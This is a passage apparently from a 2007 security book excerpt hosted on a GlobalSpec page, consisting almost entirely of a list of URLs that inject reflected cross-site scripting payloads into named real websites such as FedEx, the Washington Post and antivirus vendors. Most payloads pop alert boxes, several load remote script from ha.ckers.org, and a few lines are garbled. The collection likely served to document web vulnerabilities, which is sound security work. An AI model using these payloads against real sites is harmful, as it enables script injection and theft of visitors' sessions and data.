  • www.guestcity.com/cgi-bin/view.fcgi?book=XSSman%22%3E%3Cscript%3Ealert(Strmg.fromCharCode(88,83,83))%3C/script%3E%3Cx

  • https://www.scientology.org/html/std/portal/login/cosRegistrationlSubmitter.jsp?csDomain=scientology&csSiteId=scientology&csLocale=en_US&csFolder=portal/login&firstName=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx%20%261astName%3D%22%29%3Balert%28%22XSS%22%29%3C/script%3E%3Cx%26emailAddress%3Dnull%2540none.org%26iasNumber%3Dl11111111111111l%26userId%3Duserme%26userPassword%3Daaaaaa%26userPassword2%3Daaaaaa

  • http://torrentreactor.net/search.php?search=&words=XSSman%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/script%3E%3Cx+

  • www.quickheal.co.in/site_search.asp?search=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&submit=Search+%3E%3E

  • www.phazeddl.com/search.php?q=%22/%3E%3Ciframe%20src%3Dhttp%3A//ha.ckers.org/scriptlet.html%20

  • http://bubblare.se/search.jsp?query=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E

  • http://alerts.f-prot.com/cgi-bin/alerts_subscribe.pl?name=XSS%20here%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&email=&action=confirm&lang=en&step=step_1&aiext=step_2&submit=%A0%A0%A0%A0Submit%A0%3E%3E%A0%A0%A0

  • www.asw.cz/i_kat_207.php?lang=LeetSpeek%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20

  • www.avast.com/i_kat_207.php?lang=LeetSpeek%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.virus-buster.hu/en/newsletter/admin/&type_alert=1&type_security=1&type_news=1&type_products=1&email=XSS%20here%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&newsletter.x=0&newsletter.y=0&newsletter_submitted=1&nletter_email_submit=1

  • www.enormousdating.com/go.php?name=%22%3E%3Cscript%3Ealert(%22XSS0%22)%3C/script%3E%3Cx%20&email=%22%3E%3Cscript%3Ealert(%22XSSl%22)%3C/script%3E%3Cx%20&url=%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cx%20&comments=%3C/textarea%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cx%20&token=&Submit=Submit

  • http://support.honestnetworks.com/cgi-bin/helpdesk/pdesk.cgi?1=XSS0%22%3E%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E%3Cx+&email=XSSl%22%3E%3Cscript%3Ealert%28%22XSSl%22%29%3C%2Fscript%3E%3Cx+&priority=3&category=Sales&subject=XSS2%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&description=+&file=&lang=en&user=Unregistered&username=Unregistered&do=submit_req&Submit=Submit

  • www.bseindia.com/qresann/cressearch_3.asp?myScrip=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E&flag=sr

  • www.telco.com/int/index/en/search?words=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

  • www.nukecops.com/modules.php?name=Your_Account&redirect=%3E%3Cscript%20src=//ha.ckers.org/s.js?&folder=inbox

  • www.visitlasvegas.com/vegas/site/search?keyword_global_search=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • www2.chinatelecom.com.cn/areacode/result3.php?code=%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&imageField22.x=0&imageField22.y=0

  • https://ftn.fedex.com/app/quickfind/QuickFindAction_en.jsp?masterBill=XSS%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • http://sitesearch.websidestory.com/?q=XSS+holes%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0

  • http://forums.washingtonpost.com/dir-app/bbcard/profile_center.asp?webtag=wpforums&cType=2&uName=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&dMode=0&eBtn=0&uid=321890205&

  • http://weather.kansascity.com/auto/kansascity/radar/mixedcomposite.asp?region=%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E

  • https://bostonglobe.com/subscriber/ofFer/go/zipnodel.asp?zip=%3Cscript%20src=%22http://ha.ckers.org/s.jS%22%3E%3C/script%3E

  • www.nypost.com/search/search.htm?q=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&s=news&t=0

Copyright Elsevier, Inc. 2007 under license agreement with Books24x7
< Previous Excerpt
Purchase This Book

UNLIMITED FREE
ACCESS TO THE WORLD'S BEST IDEAS

SUBMIT
Already a GlobalSpec user? Log in.

This is embarrasing...

An error occurred while processing the form. Please try again in a few minutes.

Customize Your GlobalSpec Experience

Category: Oxidation Reduction Potential (ORP) Instruments

Select Your Free Newsletters

Industry Newsletters

Select Your Free Product Alerts

Finish!
Privacy Policy

This is embarrasing...

An error occurred while processing the form. Please try again in a few minutes.